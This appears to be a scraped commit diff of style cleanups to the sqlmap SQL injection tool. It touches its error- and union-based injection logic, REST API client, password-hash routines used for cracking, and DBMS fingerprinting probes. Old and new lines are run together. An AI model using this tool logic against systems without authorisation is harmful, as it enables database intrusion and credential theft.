or extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) \ extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) or
or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) or
extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
)
if trimmed: if trimmed:
if not chunkTest: if not chunkTest:
@ -308,12 +311,7 @@ def errorUse(expression, dump=False):
# entry at a time # entry at a time
# NOTE: we assume that only queries that get data from a table can # NOTE: we assume that only queries that get data from a table can
# return multiple entries # return multiple entries
if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \ if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \
or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \
expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)
if limitCond: if limitCond:

8
lib/techniques/union/use.py
View File

@ -233,13 +233,7 @@ def unionUse(expression, unpack=True, dump=False):
# SQL limiting the query output one entry at a time # SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table can # NOTE: we assume that only queries that get data from a table can
# return multiple entries # return multiple entries
if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
kb.forcePartialUnion or \
(dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \
" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \
not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \
and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)
if limitCond: if limitCond:

21
lib/utils/api.py
View File

@ -94,7 +94,7 @@ class Database(object):
else: else:
self.cursor.execute(statement) self.cursor.execute(statement)
except sqlite3.OperationalError, ex: except sqlite3.OperationalError, ex:
if not "locked" in getSafeExString(ex): if "locked" not in getSafeExString(ex):
raise raise
else: else:
break break
@ -103,22 +103,11 @@ class Database(object):
return self.cursor.fetchall() return self.cursor.fetchall()
def init(self): def init(self):
self.execute("CREATE TABLE logs(" self.execute("CREATE TABLE logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)")
"id INTEGER PRIMARY KEY AUTOINCREMENT, "
"taskid INTEGER, time TEXT, "
"level TEXT, message TEXT"
")")
self.execute("CREATE TABLE data(" self.execute("CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)")
"id INTEGER PRIMARY KEY AUTOINCREMENT, "
"taskid INTEGER, status INTEGER, "
"content_type INTEGER, value TEXT"
")")
self.execute("CREATE TABLE errors(" self.execute("CREATE TABLE errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)")
"id INTEGER PRIMARY KEY AUTOINCREMENT, "
"taskid INTEGER, error TEXT"
")")
class Task(object): class Task(object):
def __init__(self, taskid, remote_addr): def __init__(self, taskid, remote_addr):
@ -860,7 +849,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non
return return
elif command in ("help", "?"): elif command in ("help", "?"):
msg = "help Show this help message\n" msg = "help Show this help message\n"
msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n"
msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n"
msg += "data Retrieve and show data for current task\n" msg += "data Retrieve and show data for current task\n"

2
lib/utils/crawler.py
View File

@ -167,7 +167,7 @@ def crawl(target):
if not conf.bulkFile: if not conf.bulkFile:
logger.info("searching for links with depth %d" % (i + 1)) logger.info("searching for links with depth %d" % (i + 1))
runThreads(numThreads, crawlThread, threadChoice=(i>0)) runThreads(numThreads, crawlThread, threadChoice=(i > 0))
clearConsoleLine(True) clearConsoleLine(True)
if threadData.shared.deeper: if threadData.shared.deeper:

1
lib/utils/deps.py
View File

@ -108,4 +108,3 @@ def checkDependencies():
if len(missing_libraries) == 0: if len(missing_libraries) == 0:
infoMsg = "all dependencies are installed" infoMsg = "all dependencies are installed"
logger.info(infoMsg) logger.info(infoMsg)

5
lib/utils/getch.py
View File

@ -25,7 +25,7 @@ class _Getch(object):
class _GetchUnix(object): class _GetchUnix(object):
def __init__(self): def __init__(self):
import tty __import__("tty")
def __call__(self): def __call__(self):
import sys import sys
@ -44,7 +44,7 @@ class _GetchUnix(object):
class _GetchWindows(object): class _GetchWindows(object):
def __init__(self): def __init__(self):
import msvcrt __import__("msvcrt")
def __call__(self): def __call__(self):
import msvcrt import msvcrt
@ -81,4 +81,3 @@ class _GetchMacCarbon(object):
getch = _Getch() getch = _Getch()

71
lib/utils/hash.py
View File

@ -135,7 +135,6 @@ def postgres_passwd(password, username, uppercase=False):
'md599e5ea7a6f7c3269995cba3927fd0093' 'md599e5ea7a6f7c3269995cba3927fd0093'
""" """
if isinstance(username, unicode): if isinstance(username, unicode):
username = unicode.encode(username, UNICODE_ENCODING) username = unicode.encode(username, UNICODE_ENCODING)
@ -380,7 +379,7 @@ def unix_md5_passwd(password, salt, magic="$1$", **kwargs):
ctx = password + magic + salt ctx = password + magic + salt
final = md5(password + salt + password).digest() final = md5(password + salt + password).digest()
for pl in xrange(len(password),0,-16): for pl in xrange(len(password), 0, -16):
if pl > 16: if pl > 16:
ctx = ctx + final[:16] ctx = ctx + final[:16]
else: else:
@ -389,7 +388,7 @@ def unix_md5_passwd(password, salt, magic="$1$", **kwargs):
i = len(password) i = len(password)
while i: while i:
if i & 1: if i & 1:
ctx = ctx + chr(0) #if ($i & 1) { $ctx->add(pack("C", 0)); } ctx = ctx + chr(0) # if ($i & 1) { $ctx->add(pack("C", 0)); }
else: else:
ctx = ctx + password[0] ctx = ctx + password[0]
i = i >> 1 i = i >> 1
@ -417,7 +416,7 @@ def unix_md5_passwd(password, salt, magic="$1$", **kwargs):
final = md5(ctx1).digest() final = md5(ctx1).digest()
hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))),4) hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))), 4)
hash_ = hash_ + _encode64((int(ord(final[1])) << 16) | (int(ord(final[7])) << 8) | (int(ord(final[13]))), 4) hash_ = hash_ + _encode64((int(ord(final[1])) << 16) | (int(ord(final[7])) << 8) | (int(ord(final[13]))), 4)
hash_ = hash_ + _encode64((int(ord(final[2])) << 16) | (int(ord(final[8])) << 8) | (int(ord(final[14]))), 4) hash_ = hash_ + _encode64((int(ord(final[2])) << 16) | (int(ord(final[8])) << 8) | (int(ord(final[14]))), 4)
hash_ = hash_ + _encode64((int(ord(final[3])) << 16) | (int(ord(final[9])) << 8) | (int(ord(final[15]))), 4) hash_ = hash_ + _encode64((int(ord(final[3])) << 16) | (int(ord(final[9])) << 8) | (int(ord(final[15]))), 4)
@ -522,38 +521,38 @@ def wordpress_passwd(password, salt, count, prefix, **kwargs):
return "%s%s" % (prefix, _encode64(hash_, 16)) return "%s%s" % (prefix, _encode64(hash_, 16))
__functions__ = { __functions__ = {
HASH.MYSQL: mysql_passwd, HASH.MYSQL: mysql_passwd,
HASH.MYSQL_OLD: mysql_old_passwd, HASH.MYSQL_OLD: mysql_old_passwd,
HASH.POSTGRES: postgres_passwd, HASH.POSTGRES: postgres_passwd,
HASH.MSSQL: mssql_passwd, HASH.MSSQL: mssql_passwd,
HASH.MSSQL_OLD: mssql_old_passwd, HASH.MSSQL_OLD: mssql_old_passwd,
HASH.MSSQL_NEW: mssql_new_passwd, HASH.MSSQL_NEW: mssql_new_passwd,
HASH.ORACLE: oracle_passwd, HASH.ORACLE: oracle_passwd,
HASH.ORACLE_OLD: oracle_old_passwd, HASH.ORACLE_OLD: oracle_old_passwd,
HASH.MD5_GENERIC: md5_generic_passwd, HASH.MD5_GENERIC: md5_generic_passwd,
HASH.SHA1_GENERIC: sha1_generic_passwd, HASH.SHA1_GENERIC: sha1_generic_passwd,
HASH.SHA224_GENERIC: sha224_generic_passwd, HASH.SHA224_GENERIC: sha224_generic_passwd,
HASH.SHA256_GENERIC: sha256_generic_passwd, HASH.SHA256_GENERIC: sha256_generic_passwd,
HASH.SHA384_GENERIC: sha384_generic_passwd, HASH.SHA384_GENERIC: sha384_generic_passwd,
HASH.SHA512_GENERIC: sha512_generic_passwd, HASH.SHA512_GENERIC: sha512_generic_passwd,
HASH.CRYPT_GENERIC: crypt_generic_passwd, HASH.CRYPT_GENERIC: crypt_generic_passwd,
HASH.JOOMLA: joomla_passwd, HASH.JOOMLA: joomla_passwd,
HASH.DJANGO_MD5: django_md5_passwd, HASH.DJANGO_MD5: django_md5_passwd,
HASH.DJANGO_SHA1: django_sha1_passwd, HASH.DJANGO_SHA1: django_sha1_passwd,
HASH.WORDPRESS: wordpress_passwd, HASH.WORDPRESS: wordpress_passwd,
HASH.APACHE_MD5_CRYPT: unix_md5_passwd, HASH.APACHE_MD5_CRYPT: unix_md5_passwd,
HASH.UNIX_MD5_CRYPT: unix_md5_passwd, HASH.UNIX_MD5_CRYPT: unix_md5_passwd,
HASH.APACHE_SHA1: apache_sha1_passwd, HASH.APACHE_SHA1: apache_sha1_passwd,
HASH.VBULLETIN: vbulletin_passwd, HASH.VBULLETIN: vbulletin_passwd,
HASH.VBULLETIN_OLD: vbulletin_passwd, HASH.VBULLETIN_OLD: vbulletin_passwd,
HASH.SSHA: ssha_passwd, HASH.SSHA: ssha_passwd,
HASH.SSHA256: ssha256_passwd, HASH.SSHA256: ssha256_passwd,
HASH.SSHA512: ssha512_passwd, HASH.SSHA512: ssha512_passwd,
HASH.MD5_BASE64: md5_generic_passwd, HASH.MD5_BASE64: md5_generic_passwd,
HASH.SHA1_BASE64: sha1_generic_passwd, HASH.SHA1_BASE64: sha1_generic_passwd,
HASH.SHA256_BASE64: sha256_generic_passwd, HASH.SHA256_BASE64: sha256_generic_passwd,
HASH.SHA512_BASE64: sha512_generic_passwd, HASH.SHA512_BASE64: sha512_generic_passwd,
} }
def storeHashesToFile(attack_dict): def storeHashesToFile(attack_dict):
if not attack_dict: if not attack_dict:

504
lib/utils/htmlentities.py
View File

@ -8,256 +8,256 @@ See the file 'LICENSE' for copying permission
# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html # Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html
htmlEntities = { htmlEntities = {
'quot': 34, "quot": 34,
'amp': 38, "amp": 38,
'lt': 60, "lt": 60,
'gt': 62, "gt": 62,
'nbsp': 160, "nbsp": 160,
'iexcl': 161, "iexcl": 161,
'cent': 162, "cent": 162,
'pound': 163, "pound": 163,
'curren': 164, "curren": 164,
'yen': 165, "yen": 165,
'brvbar': 166, "brvbar": 166,
'sect': 167, "sect": 167,
'uml': 168, "uml": 168,
'copy': 169, "copy": 169,
'ordf': 170, "ordf": 170,
'laquo': 171, "laquo": 171,
'not': 172, "not": 172,
'shy': 173, "shy": 173,
'reg': 174, "reg": 174,
'macr': 175, "macr": 175,
'deg': 176, "deg": 176,
'plusmn': 177, "plusmn": 177,
'sup2': 178, "sup2": 178,
'sup3': 179, "sup3": 179,
'acute': 180, "acute": 180,
'micro': 181, "micro": 181,
'para': 182, "para": 182,
'middot': 183, "middot": 183,
'cedil': 184, "cedil": 184,
'sup1': 185, "sup1": 185,
'ordm': 186, "ordm": 186,
'raquo': 187, "raquo": 187,
'frac14': 188, "frac14": 188,
'frac12': 189, "frac12": 189,
'frac34': 190, "frac34": 190,
'iquest': 191, "iquest": 191,
'Agrave': 192, "Agrave": 192,
'Aacute': 193, "Aacute": 193,
'Acirc': 194, "Acirc": 194,
'Atilde': 195, "Atilde": 195,
'Auml': 196, "Auml": 196,
'Aring': 197, "Aring": 197,
'AElig': 198, "AElig": 198,
'Ccedil': 199, "Ccedil": 199,
'Egrave': 200, "Egrave": 200,
'Eacute': 201, "Eacute": 201,
'Ecirc': 202, "Ecirc": 202,
'Euml': 203, "Euml": 203,
'Igrave': 204, "Igrave": 204,
'Iacute': 205, "Iacute": 205,
'Icirc': 206, "Icirc": 206,
'Iuml': 207, "Iuml": 207,
'ETH': 208, "ETH": 208,
'Ntilde': 209, "Ntilde": 209,
'Ograve': 210, "Ograve": 210,
'Oacute': 211, "Oacute": 211,
'Ocirc': 212, "Ocirc": 212,
'Otilde': 213, "Otilde": 213,
'Ouml': 214, "Ouml": 214,
'times': 215, "times": 215,
'Oslash': 216, "Oslash": 216,
'Ugrave': 217, "Ugrave": 217,
'Uacute': 218, "Uacute": 218,
'Ucirc': 219, "Ucirc": 219,
'Uuml': 220, "Uuml": 220,
'Yacute': 221, "Yacute": 221,
'THORN': 222, "THORN": 222,
'szlig': 223, "szlig": 223,
'agrave': 224, "agrave": 224,
'aacute': 225, "aacute": 225,
'acirc': 226, "acirc": 226,
'atilde': 227, "atilde": 227,
'auml': 228, "auml": 228,
'aring': 229, "aring": 229,
'aelig': 230, "aelig": 230,
'ccedil': 231, "ccedil": 231,
'egrave': 232, "egrave": 232,
'eacute': 233, "eacute": 233,
'ecirc': 234, "ecirc": 234,
'euml': 235, "euml": 235,
'igrave': 236, "igrave": 236,
'iacute': 237, "iacute": 237,
'icirc': 238, "icirc": 238,
'iuml': 239, "iuml": 239,
'eth': 240, "eth": 240,
'ntilde': 241, "ntilde": 241,
'ograve': 242, "ograve": 242,
'oacute': 243, "oacute": 243,
'ocirc': 244, "ocirc": 244,
'otilde': 245, "otilde": 245,
'ouml': 246, "ouml": 246,
'divide': 247, "divide": 247,
'oslash': 248, "oslash": 248,
'ugrave': 249, "ugrave": 249,
'uacute': 250, "uacute": 250,
'ucirc': 251, "ucirc": 251,
'uuml': 252, "uuml": 252,
'yacute': 253, "yacute": 253,
'thorn': 254, "thorn": 254,
'yuml': 255, "yuml": 255,
'OElig': 338, "OElig": 338,
'oelig': 339, "oelig": 339,
'Scaron': 352, "Scaron": 352,
'fnof': 402, "fnof": 402,
'scaron': 353, "scaron": 353,
'Yuml': 376, "Yuml": 376,
'circ': 710, "circ": 710,
'tilde': 732, "tilde": 732,
'Alpha': 913, "Alpha": 913,
'Beta': 914, "Beta": 914,
'Gamma': 915, "Gamma": 915,
'Delta': 916, "Delta": 916,
'Epsilon': 917, "Epsilon": 917,
'Zeta': 918, "Zeta": 918,
'Eta': 919, "Eta": 919,
'Theta': 920, "Theta": 920,
'Iota': 921, "Iota": 921,
'Kappa': 922, "Kappa": 922,
'Lambda': 923, "Lambda": 923,
'Mu': 924, "Mu": 924,
'Nu': 925, "Nu": 925,
'Xi': 926, "Xi": 926,
'Omicron': 927, "Omicron": 927,
'Pi': 928, "Pi": 928,
'Rho': 929, "Rho": 929,
'Sigma': 931, "Sigma": 931,
'Tau': 932, "Tau": 932,
'Upsilon': 933, "Upsilon": 933,
'Phi': 934, "Phi": 934,
'Chi': 935, "Chi": 935,
'Psi': 936, "Psi": 936,
'Omega': 937, "Omega": 937,
'alpha': 945, "alpha": 945,
'beta': 946, "beta": 946,
'gamma': 947, "gamma": 947,
'delta': 948, "delta": 948,
'epsilon': 949, "epsilon": 949,
'zeta': 950, "zeta": 950,
'eta': 951, "eta": 951,
'theta': 952, "theta": 952,
'iota': 953, "iota": 953,
'kappa': 954, "kappa": 954,
'lambda': 955, "lambda": 955,
'mu': 956, "mu": 956,
'nu': 957, "nu": 957,
'xi': 958, "xi": 958,
'omicron': 959, "omicron": 959,
'pi': 960, "pi": 960,
'rho': 961, "rho": 961,
'sigmaf': 962, "sigmaf": 962,
'sigma': 963, "sigma": 963,
'tau': 964, "tau": 964,
'upsilon': 965, "upsilon": 965,
'phi': 966, "phi": 966,
'chi': 967, "chi": 967,
'psi': 968, "psi": 968,
'omega': 969, "omega": 969,
'thetasym': 977, "thetasym": 977,
'upsih': 978, "upsih": 978,
'piv': 982, "piv": 982,
'bull': 8226, "bull": 8226,
'hellip': 8230, "hellip": 8230,
'prime': 8242, "prime": 8242,
'Prime': 8243, "Prime": 8243,
'oline': 8254, "oline": 8254,
'frasl': 8260, "frasl": 8260,
'ensp': 8194, "ensp": 8194,
'emsp': 8195, "emsp": 8195,
'thinsp': 8201, "thinsp": 8201,
'zwnj': 8204, "zwnj": 8204,
'zwj': 8205, "zwj": 8205,
'lrm': 8206, "lrm": 8206,
'rlm': 8207, "rlm": 8207,
'ndash': 8211, "ndash": 8211,
'mdash': 8212, "mdash": 8212,
'lsquo': 8216, "lsquo": 8216,
'rsquo': 8217, "rsquo": 8217,
'sbquo': 8218, "sbquo": 8218,
'ldquo': 8220, "ldquo": 8220,
'rdquo': 8221, "rdquo": 8221,
'bdquo': 8222, "bdquo": 8222,
'dagger': 8224, "dagger": 8224,
'Dagger': 8225, "Dagger": 8225,
'permil': 8240, "permil": 8240,
'lsaquo': 8249, "lsaquo": 8249,
'rsaquo': 8250, "rsaquo": 8250,
'euro': 8364, "euro": 8364,
'weierp': 8472, "weierp": 8472,
'image': 8465, "image": 8465,
'real': 8476, "real": 8476,
'trade': 8482, "trade": 8482,
'alefsym': 8501, "alefsym": 8501,
'larr': 8592, "larr": 8592,
'uarr': 8593, "uarr": 8593,
'rarr': 8594, "rarr": 8594,
'darr': 8595, "darr": 8595,
'harr': 8596, "harr": 8596,
'crarr': 8629, "crarr": 8629,
'lArr': 8656, "lArr": 8656,
'uArr': 8657, "uArr": 8657,
'rArr': 8658, "rArr": 8658,
'dArr': 8659, "dArr": 8659,
'hArr': 8660, "hArr": 8660,
'forall': 8704, "forall": 8704,
'part': 8706, "part": 8706,
'exist': 8707, "exist": 8707,
'empty': 8709, "empty": 8709,
'nabla': 8711, "nabla": 8711,
'isin': 8712, "isin": 8712,
'notin': 8713, "notin": 8713,
'ni': 8715, "ni": 8715,
'prod': 8719, "prod": 8719,
'sum': 8721, "sum": 8721,
'minus': 8722, "minus": 8722,
'lowast': 8727, "lowast": 8727,
'radic': 8730, "radic": 8730,
'prop': 8733, "prop": 8733,
'infin': 8734, "infin": 8734,
'ang': 8736, "ang": 8736,
'and': 8743, "and": 8743,
'or': 8744, "or": 8744,
'cap': 8745, "cap": 8745,
'cup': 8746, "cup": 8746,
'int': 8747, "int": 8747,
'there4': 8756, "there4": 8756,
'sim': 8764, "sim": 8764,
'cong': 8773, "cong": 8773,
'asymp': 8776, "asymp": 8776,
'ne': 8800, "ne": 8800,
'equiv': 8801, "equiv": 8801,
'le': 8804, "le": 8804,
'ge': 8805, "ge": 8805,
'sub': 8834, "sub": 8834,
'sup': 8835, "sup": 8835,
'nsub': 8836, "nsub": 8836,
'sube': 8838, "sube": 8838,
'supe': 8839, "supe": 8839,
'oplus': 8853, "oplus": 8853,
'otimes': 8855, "otimes": 8855,
'perp': 8869, "perp": 8869,
'sdot': 8901, "sdot": 8901,
'lceil': 8968, "lceil": 8968,
'rceil': 8969, "rceil": 8969,
'lfloor': 8970, "lfloor": 8970,
'rfloor': 8971, "rfloor": 8971,
'lang': 9001, "lang": 9001,
'rang': 9002, "rang": 9002,
'loz': 9674, "loz": 9674,
'spades': 9824, "spades": 9824,
'clubs': 9827, "clubs": 9827,
'hearts': 9829, "hearts": 9829,
'diams': 9830, "diams": 9830,
} }

3
lib/utils/progress.py
View File

@ -62,8 +62,7 @@ class ProgressBar(object):
elif numHashes == allFull: elif numHashes == allFull:
self._progBar = "[%s]" % ("=" * allFull) self._progBar = "[%s]" % ("=" * allFull)
else: else:
self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), " " * (allFull - numHashes))
" " * (allFull - numHashes))
# Add the percentage at the beginning of the progress bar # Add the percentage at the beginning of the progress bar
percentString = getUnicode(percentDone) + "%" percentString = getUnicode(percentDone) + "%"

2
lib/utils/versioncheck.py
View File

@ -20,4 +20,4 @@ except ImportError:
errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions))
errMsg += "most likely because current version of Python has been " errMsg += "most likely because current version of Python has been "
errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')"
exit(errMsg) exit(errMsg)

2
lib/utils/xrange.py
View File

@ -69,7 +69,7 @@ class xrange(object):
if isinstance(index, slice): if isinstance(index, slice):
start, stop, step = index.indices(self._len()) start, stop, step = index.indices(self._len())
return xrange(self._index(start), return xrange(self._index(start),
self._index(stop), step*self.step) self._index(stop), step * self.step)
elif isinstance(index, (int, long)): elif isinstance(index, (int, long)):
if index < 0: if index < 0:
fixed_index = index + self._len() fixed_index = index + self._len()

11
plugins/dbms/access/fingerprint.py
View File

@ -48,11 +48,12 @@ class Fingerprint(GenericFingerprint):
# Microsoft Access table reference updated on 01/2010 # Microsoft Access table reference updated on 01/2010
sysTables = { sysTables = {
"97": ("MSysModules2", "MSysAccessObjects"), "97": ("MSysModules2", "MSysAccessObjects"),
"2000" : ("!MSysModules2", "MSysAccessObjects"), "2000": ("!MSysModules2", "MSysAccessObjects"),
"2002-2003" : ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), "2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"),
"2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs"), "2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"),
} }
# MSysAccessXML is not a reliable system table because it doesn't always exist # MSysAccessXML is not a reliable system table because it doesn't always exist
# ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty") # ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty")

1
plugins/dbms/db2/connector.py
View File

@ -37,7 +37,6 @@ class Connector(GenericConnector):
except ibm_db_dbi.OperationalError, msg: except ibm_db_dbi.OperationalError, msg:
raise SqlmapConnectionException(msg) raise SqlmapConnectionException(msg)
self.initCursor() self.initCursor()
self.printConnected() self.printConnected()

12
plugins/dbms/db2/fingerprint.py
View File

@ -64,9 +64,9 @@ class Fingerprint(GenericFingerprint):
value += DBMS.DB2 value += DBMS.DB2
return value return value
actVer = Format.getDbms() actVer = Format.getDbms()
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if kb.bannerFp: if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
@ -127,12 +127,14 @@ class Fingerprint(GenericFingerprint):
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
if result: if result:
versions = { "2003": ("5.2", (2, 1)), versions = {
"2003": ("5.2", (2, 1)),
"2008": ("7.0", (1,)), "2008": ("7.0", (1,)),
"2000": ("5.0", (4, 3, 2, 1)), "2000": ("5.0", (4, 3, 2, 1)),
"7": ("6.1", (1, 0)), "7": ("6.1", (1, 0)),
"XP": ("5.1", (2, 1)), "XP": ("5.1", (2, 1)),
"NT": ("4.0", (6, 5, 4, 3, 2, 1)) } "NT": ("4.0", (6, 5, 4, 3, 2, 1))
}
# Get back-end DBMS underlying operating system version # Get back-end DBMS underlying operating system version
for version, data in versions.items(): for version, data in versions.items():

4
plugins/dbms/firebird/connector.py
View File

@ -39,8 +39,8 @@ class Connector(GenericConnector):
self.checkFileDb() self.checkFileDb()
try: try:
self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \ # Reference: http://www.daniweb.com/forums/thread248499.html
user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") # Reference: http://www.daniweb.com/forums/thread248499.html self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8")
except kinterbasdb.OperationalError, msg: except kinterbasdb.OperationalError, msg:
raise SqlmapConnectionException(msg[1]) raise SqlmapConnectionException(msg[1])

12
plugins/dbms/firebird/fingerprint.py
View File

@ -68,12 +68,12 @@ class Fingerprint(GenericFingerprint):
def _sysTablesCheck(self): def _sysTablesCheck(self):
retVal = None retVal = None
table = ( table = (
("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)), ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)),
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")), ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")), ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")), ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
# TODO: add test for Firebird 2.5 # TODO: add test for Firebird 2.5
) )
for i in xrange(len(table)): for i in xrange(len(table)):
version, checks = table[i] version, checks = table[i]

9
plugins/dbms/hsqldb/connector.py
View File

@ -46,11 +46,8 @@ class Connector(GenericConnector):
try: try:
driver = 'org.hsqldb.jdbc.JDBCDriver' driver = 'org.hsqldb.jdbc.JDBCDriver'
connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) connection_string = 'jdbc:hsqldb:mem:.' # 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)
self.connector = jaydebeapi.connect(driver, self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password))
connection_string,
str(self.user),
str(self.password))
except Exception, msg: except Exception, msg:
raise SqlmapConnectionException(msg[0]) raise SqlmapConnectionException(msg[0])
@ -70,7 +67,7 @@ class Connector(GenericConnector):
try: try:
self.cursor.execute(query) self.cursor.execute(query)
retVal = True retVal = True
except Exception, msg: #todo fix with specific error except Exception, msg: # TODO: fix with specific error
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
self.connector.commit() self.connector.commit()

1
plugins/dbms/informix/connector.py
View File

@ -37,7 +37,6 @@ class Connector(GenericConnector):
except ibm_db_dbi.OperationalError, msg: except ibm_db_dbi.OperationalError, msg:
raise SqlmapConnectionException(msg) raise SqlmapConnectionException(msg)
self.initCursor() self.initCursor()
self.printConnected() self.printConnected()

2
plugins/dbms/informix/syntax.py
View File

@ -41,4 +41,4 @@ class Syntax(GenericSyntax):
for _ in excluded.items(): for _ in excluded.items():
retVal = retVal.replace(_[1], _[0]) retVal = retVal.replace(_[1], _[0])
return retVal return retVal

6
plugins/dbms/maxdb/enumeration.py
View File

@ -108,7 +108,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
elif conf.db is not None: elif conf.db is not None:
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
